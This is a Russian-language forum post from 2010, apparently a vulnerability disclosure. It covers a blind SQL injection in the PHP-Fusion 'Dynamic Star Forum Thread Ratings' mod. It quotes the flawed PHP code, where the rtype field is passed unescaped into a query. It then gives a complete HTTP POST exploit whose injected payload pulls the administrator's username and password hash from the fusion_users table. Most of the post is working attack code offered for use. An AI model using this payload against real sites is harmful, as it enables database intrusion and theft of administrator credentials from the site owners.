Показать сообщение отдельно
Старый 05.07.2010, 16:40   #2
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию PHP-Fusion MOD [Dynamic Star Forum Thread Ratings] Blind SQL injection Vulnerability

MOD name: Dynamic Star Forum Thread Ratings (download)
Version: 1.00

Blind SQL injection

Vuln file: /forum/includes/ajax_rating/rating_process.php
PHP код:
/*...*/
if($_POST) {

    
$id escape($_POST['id']);
    
$rating = (int) $_POST['rating'];
    
$rtype $_POST['rtype'];
/*...*/
    
if($rating <= && $rating >= 1) {
    
        if ((
dbarray(dbquery("SELECT rating_item_id FROM ".DB_RATINGS." WHERE rating_item_id='".$id."' AND rating_type='".$rtype."' AND rating_ip='".$_SERVER['REMOTE_ADDR']."' AND rating_user = '".$userdata."'"))) || isset($_COOKIE['has_voted_'.$id])) {
        
            echo 
'already_voted'; exit;
/*...*/ 
Need: magic_quotes = off
Exploit:
Код:
POST http://[host]/[path]/forum/includes/ajax_rating/rating_process.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=1&rating=5&rtype=1' or (select * from (select count(*),concat((select concat_ws(0x3a,user_name,user_password) from fusion_users where user_id=1),floor(rand(0)*2)) from fusion_admin group by 2)x)--
RulleR вне форума   Ответить с цитированием